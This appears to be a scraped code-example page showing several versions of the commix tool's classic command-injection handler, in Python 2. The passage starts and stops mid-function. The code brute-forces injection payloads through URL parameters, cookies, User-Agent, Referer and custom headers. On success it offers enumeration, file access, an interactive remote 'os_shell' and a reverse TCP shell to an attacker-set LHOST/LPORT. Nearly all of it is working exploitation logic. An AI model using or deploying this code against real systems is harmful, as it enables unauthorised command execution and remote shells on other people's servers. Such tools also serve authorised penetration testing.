              settings.LOAD_SESSION = False  
            
            # Check for any enumeration options.
            if settings.ENUMERATION_DONE == True :
              while True:
                question_msg = "Do you want to enumerate again? [Y/n/q] > "
                enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower()
                if enumerate_again in settings.CHOICE_YES:
                  cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                  print ""
                  break
                elif enumerate_again in settings.CHOICE_NO: 
                  break
                elif enumerate_again in settings.CHOICE_QUIT:
                  sys.exit(0)
                else:
                  if enumerate_again == "":
                    enumerate_again = "enter"
                  err_msg = "'" + enumerate_again + "' is not a valid answer."  
                  print settings.print_error_msg(err_msg)
                  pass
            else:
              if menu.enumeration_options():
                cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
          
            if not menu.file_access_options() and not menu.options.os_cmd:
              print ""
            
            # Check for any system file access options.
            if settings.FILE_ACCESS_DONE == True :
              if settings.ENUMERATION_DONE != True:
                print ""
              while True:
                question_msg = "Do you want to access files again? [Y/n/q] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                file_access_again = sys.stdin.readline().replace("\n","").lower()
                if file_access_again in settings.CHOICE_YES:
                  cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                  print ""
                  break
                elif file_access_again in settings.CHOICE_NO: 
                  break
                elif file_access_again in settings.CHOICE_QUIT:
                  sys.exit(0)
                else:
                  if file_access_again == "":
                    file_access_again  = "enter"
                  err_msg = "'" + file_access_again  + "' is not a valid answer."  
                  print settings.print_error_msg(err_msg)
                  pass
            else:
              if menu.file_access_options():
                if not menu.enumeration_options():
                  print ""
                cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                print ""
              
            # Check if defined single cmd.
            if menu.options.os_cmd:
              if not menu.file_access_options():
                print ""
              cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)

            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break 
              # if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
              #   if settings.VERBOSITY_LEVEL >= 1:
              #     print ""
              question_msg = "Do you want a Pseudo-Terminal shell? [Y/n/q] > "
              sys.stdout.write(settings.print_question_msg(question_msg))
              gotshell = sys.stdin.readline().replace("\n","").lower()
              if gotshell in settings.CHOICE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    if not readline_error:
                      # Tab compliter
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    # if settings.VERBOSITY_LEVEL >= 1:
                    #   print ""
                    if cmd.lower() in settings.SHELL_OPTIONS :
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) 
                      if os_shell_option == False:
                        if no_result == True:
                          return False
                        else:
                          return True  
                      elif os_shell_option == "quit":                    
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell": 
                        warn_msg = "You are already into the 'os_shell' mode."
                        print settings.print_warning_msg(warn_msg)+ "\n"
                      elif os_shell_option == "reverse_tcp":
                        settings.REVERSE_TCP = True
                        # Set up LHOST / LPORT for The reverse TCP connection.
                        reverse_tcp.configure_reverse_tcp()
                        if settings.REVERSE_TCP == False:
                          continue
                        while True:
                          if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(settings.LHOST)
                          else:  
                            cmd = reverse_tcp.reverse_tcp_options()
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              go_back_again = True
                              settings.REVERSE_TCP = False
                              break
                          # Command execution results.
                          response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                          # Evaluate injection results.
                          shell = cb_injector.injection_results(response, TAG, cmd)
                          if settings.VERBOSITY_LEVEL >= 1:
                            print ""
                          err_msg = "The reverse TCP connection has been failed!"
                          print settings.print_critical_msg(err_msg)
                      else:
                        pass
                    else:
                      # Command execution results.
                      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                      # if need page reload
                      if menu.options.url_reload:
                        time.sleep(delay)
                        response = urllib.urlopen(url)
                      if menu.options.ignore_session or \
                         session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
                        # Evaluate injection results.
                        try:
                          shell = cb_injector.injection_results(response, TAG, cmd)
                          shell = "".join(str(p) for p in shell)
                        except:
                          print ""
                          continue  
                        if not menu.options.ignore_session :
                          session_handler.store_cmd(url, cmd, shell, vuln_parameter)
                      else:
                        shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
                      if shell:
                        html_parser = HTMLParser.HTMLParser()
                        shell = html_parser.unescape(shell)
                      if shell != "":
                        if settings.VERBOSITY_LEVEL >= 1:
                          print ""
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        if settings.VERBOSITY_LEVEL >= 1:
                          print ""
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_critical_msg(err_msg) + "\n"

                  except KeyboardInterrupt: 
                    raise
                    
                  except SystemExit: 
                    raise

              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False 
                  else:
                    return True  

              elif gotshell in settings.CHOICE_QUIT:
                sys.exit(0)

              else:
                if gotshell == "":
                  gotshell = "enter"
                err_msg = "'" + gotshell + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
                
  if no_result == True:
    print ""
    return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Ejemplo n.º 7
0
def cb_injection_handler(url, delay, filename, http_request_method):
    counter = 1
    vp_flag = True
    no_result = True
    is_encoded = False
    export_injection_info = False
    injection_type = "Results-based Command Injection"
    technique = "classic injection technique"

    if not settings.LOAD_SESSION:
        sys.stdout.write(settings.INFO_SIGN + "Testing the " + technique +
                         "... ")
        sys.stdout.flush()
        if menu.options.verbose:
            print ""

    i = 0
    # Calculate all possible combinations
    total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(
        settings.SEPARATORS) * len(settings.SUFFIXES)
    for whitespace in settings.WHITESPACES:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:

                    # If a previous session is available.
                    if settings.LOAD_SESSION and session_handler.notification(
                            url, technique):
                        url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(
                            url, http_request_method)

                    else:
                        i = i + 1
                        # Check for bad combination of prefix and separator
                        combination = prefix + separator
                        if combination in settings.JUNK_COMBINATION:
                            prefix = ""

                        # Change TAG on every request to prevent false-positive results.
                        TAG = ''.join(
                            random.choice(string.ascii_uppercase)
                            for i in range(6))

                        randv1 = random.randrange(100)
                        randv2 = random.randrange(100)
                        randvcalc = randv1 + randv2

                        # Define alter shell
                        alter_shell = menu.options.alter_shell

                        try:
                            if alter_shell:
                                # Classic -alter shell- decision payload (check if host is vulnerable).
                                payload = cb_payloads.decision_alter_shell(
                                    separator, TAG, randv1, randv2)
                            else:
                                # Classic decision payload (check if host is vulnerable).
                                payload = cb_payloads.decision(
                                    separator, TAG, randv1, randv2)

                            # Define prefixes & suffixes
                            payload = parameters.prefixes(payload, prefix)
                            payload = parameters.suffixes(payload, suffix)

                            if menu.options.base64:
                                payload = urllib.unquote(payload)
                                payload = base64.b64encode(payload)
                            else:
                                if separator == " ":
                                    payload = re.sub(" ", "%20", payload)
                                else:
                                    payload = re.sub(" ", whitespace, payload)

                            # Check if defined "--verbose" option.
                            if menu.options.verbose:
                                print Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL

                            # if need page reload
                            if menu.options.url_reload:
                                time.sleep(delay)
                                response = urllib.urlopen(url)

                            # Cookie Injection
                            if settings.COOKIE_INJECTION == True:
                                # Check if target host is vulnerable to cookie injection.
                                vuln_parameter = parameters.specify_cookie_parameter(
                                    menu.options.cookie)
                                response = cb_injector.cookie_injection_test(
                                    url, vuln_parameter, payload)

                            # User-Agent Injection
                            elif settings.USER_AGENT_INJECTION == True:
                                # Check if target host is vulnerable to user-agent injection.
                                vuln_parameter = parameters.specify_user_agent_parameter(
                                    menu.options.agent)
                                response = cb_injector.user_agent_injection_test(
                                    url, vuln_parameter, payload)

                            # Referer Injection
                            elif settings.REFERER_INJECTION == True:
                                # Check if target host is vulnerable to referer injection.
                                vuln_parameter = parameters.specify_referer_parameter(
                                    menu.options.referer)
                                response = cb_injector.referer_injection_test(
                                    url, vuln_parameter, payload)

                            # Custom HTTP header Injection
                            elif settings.CUSTOM_HEADER_INJECTION == True:
                                # Check if target host is vulnerable to custom http header injection.
                                vuln_parameter = parameters.specify_custom_header_parameter(
                                    settings.INJECT_TAG)
                                response = cb_injector.custom_header_injection_test(
                                    url, vuln_parameter, payload)

                            else:
                                # Check if target host is vulnerable.
                                response, vuln_parameter = cb_injector.injection_test(
                                    payload, http_request_method, url)

                            # Evaluate test results.
                            shell = cb_injector.injection_test_results(
                                response, TAG, randvcalc)

                            if not menu.options.verbose:
                                percent = ((i * 100) / total)
                                float_percent = "{0:.1f}".format(
                                    round(((i * 100) / (total * 1.0)), 2))

                                if shell == False:
                                    sys.stdout.write("\r" +
                                                     settings.INFO_SIGN +
                                                     "Testing the " +
                                                     technique + "... " +
                                                     "[ " + float_percent +
                                                     "%" + " ]")
                                    sys.stdout.flush()

                                if str(float_percent) == "100.0":
                                    if no_result == True:
                                        percent = Fore.RED + "FAILED" + Style.RESET_ALL
                                    else:
                                        percent = str(float_percent) + "%"
                                elif len(shell) != 0:
                                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                                else:
                                    percent = str(float_percent) + "%"
                                sys.stdout.write("\r" + settings.INFO_SIGN +
                                                 "Testing the " + technique +
                                                 "... " + "[ " + percent +
                                                 " ]")
                                sys.stdout.flush()

                        except KeyboardInterrupt:
                            raise

                        except SystemExit:
                            raise

                        except:
                            continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        found = True
                        no_result = False

                        if settings.COOKIE_INJECTION == True:
                            header_name = " Cookie"
                            found_vuln_parameter = vuln_parameter
                            the_type = " HTTP header"

                        elif settings.USER_AGENT_INJECTION == True:
                            header_name = " User-Agent"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.REFERER_INJECTION == True:
                            header_name = " Referer"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.CUSTOM_HEADER_INJECTION == True:
                            header_name = " " + settings.CUSTOM_HEADER_NAME
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        else:
                            header_name = ""
                            the_type = " parameter"
                            if http_request_method == "GET":
                                found_vuln_parameter = parameters.vuln_GET_param(
                                    url)
                            else:
                                found_vuln_parameter = vuln_parameter

                        if len(found_vuln_parameter) != 0:
                            found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"

                        # Print the findings to log file.
                        if export_injection_info == False:
                            export_injection_info = logs.add_type_and_technique(
                                export_injection_info, filename,
                                injection_type, technique)
                        if vp_flag == True:
                            vp_flag = logs.add_parameter(
                                vp_flag, filename, http_request_method,
                                vuln_parameter, payload)
                        logs.update_payload(filename, counter, payload)
                        counter = counter + 1

                        if not menu.options.verbose and not settings.LOAD_SESSION:
                            print ""

                        # Print the findings to terminal.
                        print Style.BRIGHT + "(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL
                        print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                        print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                        ) + Style.RESET_ALL + ""
                        print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                            "%20", " ", re.sub("%2B", "+",
                                               payload)) + Style.RESET_ALL

                        # Export session
                        if not settings.LOAD_SESSION:
                            session_handler.injection_point_importation(
                                url,
                                technique,
                                injection_type,
                                separator,
                                shell[0],
                                vuln_parameter,
                                prefix,
                                suffix,
                                TAG,
                                alter_shell,
                                payload,
                                http_request_method,
                                url_time_response=0,
                                delay=0,
                                how_long=0,
                                output_length=0,
                                is_vulnerable="True")
                        else:
                            settings.LOAD_SESSION = False

                        # Check for any enumeration options.
                        if settings.ENUMERATION_DONE == True:
                            while True:
                                enumerate_again = raw_input(
                                    "\n" + settings.QUESTION_SIGN +
                                    "Do you want to enumerate again? [Y/n/q] > "
                                ).lower()
                                if enumerate_again in settings.CHOISE_YES:
                                    cb_enumeration.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename)
                                    break
                                elif enumerate_again in settings.CHOISE_NO:
                                    break
                                elif enumerate_again in settings.CHOISE_QUIT:
                                    sys.exit(0)
                                else:
                                    if enumerate_again == "":
                                        enumerate_again = "enter"
                                    print Back.RED + settings.ERROR_SIGN + "'" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL + "\n"
                                    pass
                        else:
                            if menu.enumeration_options():
                                cb_enumeration.do_check(
                                    separator, TAG, prefix, suffix, whitespace,
                                    http_request_method, url, vuln_parameter,
                                    alter_shell, filename)

                        if not menu.file_access_options(
                        ) and not menu.options.os_cmd:
                            print ""

                        # Check for any system file access options.
                        if settings.FILE_ACCESS_DONE == True:
                            while True:
                                file_access_again = raw_input(
                                    settings.QUESTION_SIGN +
                                    "Do you want to access files again? [Y/n/q] > "
                                ).lower()
                                if file_access_again in settings.CHOISE_YES:
                                    cb_file_access.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename)
                                    break
                                elif file_access_again in settings.CHOISE_NO:
                                    break
                                elif file_access_again in settings.CHOISE_QUIT:
                                    sys.exit(0)
                                else:
                                    if file_access_again == "":
                                        file_access_again = "enter"
                                    print Back.RED + settings.ERROR_SIGN + "'" + file_access_again + "' is not a valid answer." + Style.RESET_ALL + "\n"
                                    pass
                        else:
                            if menu.file_access_options():
                                if not menu.enumeration_options():
                                    print ""
                                cb_file_access.do_check(
                                    separator, TAG, prefix, suffix, whitespace,
                                    http_request_method, url, vuln_parameter,
                                    alter_shell, filename)
                                print ""

                        # Check if defined single cmd.
                        if menu.options.os_cmd:
                            if not menu.file_access_options():
                                print ""
                            cb_enumeration.single_os_cmd_exec(
                                separator, TAG, prefix, suffix, whitespace,
                                http_request_method, url, vuln_parameter,
                                alter_shell, filename)

                        # Pseudo-Terminal shell
                        go_back = False
                        go_back_again = False
                        while True:
                            if go_back == True:
                                break
                            if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                                if menu.options.verbose:
                                    print ""
                            gotshell = raw_input(
                                settings.QUESTION_SIGN +
                                "Do you want a Pseudo-Terminal shell? [Y/n/q] > "
                            ).lower()
                            if gotshell in settings.CHOISE_YES:
                                print ""
                                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                                if readline_error:
                                    checks.no_readline_module()
                                while True:
                                    try:
                                        if not readline_error:
                                            # Tab compliter
                                            readline.set_completer(
                                                menu.tab_completer)
                                            # MacOSX tab compliter
                                            if getattr(
                                                    readline, '__doc__', ''
                                            ) is not None and 'libedit' in getattr(
                                                    readline, '__doc__', ''):
                                                readline.parse_and_bind(
                                                    "bind ^I rl_complete")
                                            # Unix tab compliter
                                            else:
                                                readline.parse_and_bind(
                                                    "tab: complete")
                                        cmd = raw_input("""commix(""" +
                                                        Style.BRIGHT +
                                                        Fore.RED +
                                                        """os_shell""" +
                                                        Style.RESET_ALL +
                                                        """) > """)
                                        cmd = checks.escaped_cmd(cmd)
                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            os_shell_option = checks.check_os_shell_options(
                                                cmd.lower(), technique,
                                                go_back, no_result)
                                            if os_shell_option == False:
                                                if no_result == True:
                                                    return False
                                                else:
                                                    return True
                                            elif os_shell_option == "quit":
                                                sys.exit(0)
                                            elif os_shell_option == "back":
                                                go_back = True
                                                break
                                            elif os_shell_option == "os_shell":
                                                print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
                                            elif os_shell_option == "reverse_tcp":
                                                settings.REVERSE_TCP = True
                                                # Set up LHOST / LPORT for The reverse TCP connection.
                                                reverse_tcp.configure_reverse_tcp(
                                                )
                                                if settings.REVERSE_TCP == False:
                                                    continue
                                                if settings.REVERSE_TCP == False:
                                                    continue
                                                while True:
                                                    if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
                                                        result = checks.check_reverse_tcp_options(
                                                            settings.LHOST)
                                                    else:
                                                        cmd = reverse_tcp.reverse_tcp_options(
                                                        )
                                                        result = checks.check_reverse_tcp_options(
                                                            cmd)
                                                    if result != None:
                                                        if result == 0:
                                                            return False
                                                        elif result == 1 or result == 2:
                                                            go_back_again = True
                                                            settings.REVERSE_TCP = False
                                                            break
                                                    # Command execution results.
                                                    response = cb_injector.injection(
                                                        separator, TAG, cmd,
                                                        prefix, suffix,
                                                        whitespace,
                                                        http_request_method,
                                                        url, vuln_parameter,
                                                        alter_shell, filename)
                                                    # Evaluate injection results.
                                                    shell = cb_injector.injection_results(
                                                        response, TAG)
                                                    if menu.options.verbose:
                                                        print ""
                                                    print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
                                            else:
                                                pass
                                        else:
                                            # Command execution results.
                                            response = cb_injector.injection(
                                                separator, TAG, cmd, prefix,
                                                suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell,
                                                filename)

                                            # if need page reload
                                            if menu.options.url_reload:
                                                time.sleep(delay)
                                                response = urllib.urlopen(url)
                                            if menu.options.ignore_session or \
                                               session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
                                                # Evaluate injection results.
                                                shell = cb_injector.injection_results(
                                                    response, TAG)
                                                shell = "".join(
                                                    str(p) for p in shell)
                                                if not menu.options.ignore_session:
                                                    session_handler.store_cmd(
                                                        url, cmd, shell,
                                                        vuln_parameter)
                                            else:
                                                shell = session_handler.export_stored_cmd(
                                                    url, cmd, vuln_parameter)
                                            if shell:
                                                html_parser = HTMLParser.HTMLParser(
                                                )
                                                shell = html_parser.unescape(
                                                    shell)
                                                if shell != "":
                                                    print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                                                else:
                                                    if menu.options.verbose:
                                                        print ""
                                                    print Back.RED + settings.ERROR_SIGN + "The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"

                                    except KeyboardInterrupt:
                                        raise

                                    except SystemExit:
                                        raise

                            elif gotshell in settings.CHOISE_NO:
                                if checks.next_attack_vector(
                                        technique, go_back) == True:
                                    break
                                else:
                                    if no_result == True:
                                        return False
                                    else:
                                        return True

                            elif gotshell in settings.CHOISE_QUIT:
                                sys.exit(0)

                            else:
                                if gotshell == "":
                                    gotshell = "enter"
                                print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
                                pass

    if no_result == True:
        print ""
        return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Ejemplo n.º 8
0
def cb_injection_handler(url, delay, filename, http_request_method):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    export_injection_info = False
    injection_type = "Results-based Command Injection"
    technique = "classic injection technique"

    sys.stdout.write("(*) Testing the " + technique + "... ")
    sys.stdout.flush()

    i = 0
    # Calculate all possible combinations
    total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(
        settings.SEPARATORS) * len(settings.SUFFIXES)
    for whitespace in settings.WHITESPACES:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:
                    i = i + 1

                    # Check for bad combination of prefix and separator
                    combination = prefix + separator
                    if combination in settings.JUNK_COMBINATION:
                        prefix = ""

                    # Change TAG on every request to prevent false-positive results.
                    TAG = ''.join(
                        random.choice(string.ascii_uppercase)
                        for i in range(6))

                    randv1 = random.randrange(100)
                    randv2 = random.randrange(100)
                    randvcalc = randv1 + randv2

                    # Define alter shell
                    alter_shell = menu.options.alter_shell

                    try:
                        if not alter_shell:
                            # Classic decision payload (check if host is vulnerable).
                            payload = cb_payloads.decision(
                                separator, TAG, randv1, randv2)
                        else:
                            # Classic -alter shell- decision payload (check if host is vulnerable).
                            payload = cb_payloads.decision_alter_shell(
                                separator, TAG, randv1, randv2)

                        # Check if defined "--prefix" option.
                        if menu.options.prefix:
                            prefix = menu.options.prefix
                            payload = prefix + payload
                        else:
                            payload = prefix + payload

                        # Check if defined "--suffix" option.
                        if menu.options.suffix:
                            suffix = menu.options.suffix
                            payload = payload + suffix
                        else:
                            payload = payload + suffix

                        if separator == " ":
                            payload = re.sub(" ", "%20", payload)
                        else:
                            payload = re.sub(" ", whitespace, payload)

                        # Check if defined "--verbose" option.
                        if menu.options.verbose:
                            sys.stdout.write("\n" + Fore.GREY + payload +
                                             Style.RESET_ALL)

                        # Check if target host is vulnerable.
                        response, vuln_parameter = cb_injector.injection_test(
                            payload, http_request_method, url)

                        # if need page reload
                        if menu.options.url_reload:
                            time.sleep(delay)
                            response = urllib.urlopen(url)

                        # Evaluate test results.
                        shell = cb_injector.injection_test_results(
                            response, TAG, randvcalc)
                        if not menu.options.verbose:
                            percent = ((i * 100) / total)
                            if percent == 100:
                                if no_result == True:
                                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                                else:
                                    percent = str(percent) + "%"
                            elif len(shell) != 0:
                                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                            else:
                                percent = str(percent) + "%"
                            sys.stdout.write("\r(*) Testing the " + technique +
                                             "... " + "[ " + percent + " ]")
                            sys.stdout.flush()

                    except KeyboardInterrupt:
                        raise

                    except:
                        continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        found = True
                        no_result = False

                        # Print the findings to log file.
                        if export_injection_info == False:
                            output_file = open(filename + ".txt", "a")
                            output_file.write("\n(+) Type : " + injection_type)
                            output_file.write("\n(+) Technique : " +
                                              technique.title())
                            output_file.close()
                            export_injection_info = True

                        if http_request_method == "GET":
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            #Vulnerable Parameter
                            GET_vuln_param = parameters.vuln_GET_param(url)

                            # Print the findings to terminal.
                            print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + GET_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
                            print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                            print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                            ) + Style.RESET_ALL + ""
                            print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                                "%20", " ", payload) + Style.RESET_ALL

                        else:
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            #Vulnerable Parameter
                            POST_vuln_param = vuln_parameter

                            # Print the findings to terminal.
                            print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + POST_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
                            print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                            print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                            ) + Style.RESET_ALL + ""
                            print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                                "%20", " ", payload) + Style.RESET_ALL

                        # Check for any enumeration options.
                        cb_enumeration.do_check(separator, TAG, prefix, suffix,
                                                whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell)

                        # Check for any system file access options.
                        cb_file_access.do_check(separator, TAG, prefix, suffix,
                                                whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell)

                        # Pseudo-Terminal shell
                        while True:
                            gotshell = raw_input(
                                "\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > "
                            ).lower()
                            if gotshell in settings.CHOISE_YES:
                                print ""
                                print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                                while True:
                                    try:
                                        cmd = raw_input("Shell > ")
                                        if cmd == "q":
                                            sys.exit(0)

                                        else:
                                            # The main command injection exploitation.
                                            response = cb_injector.injection(
                                                separator, TAG, cmd, prefix,
                                                suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell)

                                            # if need page reload
                                            if menu.options.url_reload:
                                                time.sleep(delay)
                                                response = urllib.urlopen(url)

                                            # Command execution results.
                                            shell = cb_injector.injection_results(
                                                response, TAG)
                                            if shell:
                                                shell = "".join(
                                                    str(p) for p in shell)
                                                print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"

                                    except KeyboardInterrupt:
                                        print ""
                                        sys.exit(0)

                            elif gotshell in settings.CHOISE_NO:
                                if menu.options.verbose:
                                    sys.stdout.write(
                                        "\r(*) Continue testing the " +
                                        technique + "... ")
                                    sys.stdout.flush()
                                break

                            else:
                                if gotshell == "":
                                    gotshell = "enter"
                                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                                pass

    if no_result == True:
        if menu.options.verbose == False:
            print ""
            return False
        else:
            print ""
            return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Ejemplo n.º 9
0
def cb_injection_handler(url, delay, filename, http_request_method):
  
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded= False
  export_injection_info = False

  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"
      
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()
  
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          i = i + 1

          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive results.
          TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
          
          randv1 = random.randrange(100)
          randv2 = random.randrange(100)
          randvcalc = randv1 + randv2
          
          # Define alter shell
          alter_shell = menu.options.alter_shell
        
          try:
            if alter_shell:
              # Classic -alter shell- decision payload (check if host is vulnerable).
              payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
            else:
              # Classic decision payload (check if host is vulnerable).
              payload = cb_payloads.decision(separator, TAG, randv1, randv2)
            
            # Define prefixes & suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            if separator == " " :
              payload = re.sub(" ", "%20", payload)
            else:
              payload = re.sub(" ", whitespace, payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
              
            # if need page reload
            if menu.options.url_reload:
              time.sleep(delay)
              response = urllib.urlopen(url)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
            else:
              # Check if target host is vulnerable.
              response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url)

            # Evaluate test results.
            shell = cb_injector.injection_test_results(response, TAG, randvcalc)

            if not menu.options.verbose:
              percent = ((i*100)/total)
              if percent == 100:
                if no_result == True:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                else:
                  percent = str(percent)+"%"
              elif len(shell) != 0:
                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              else:
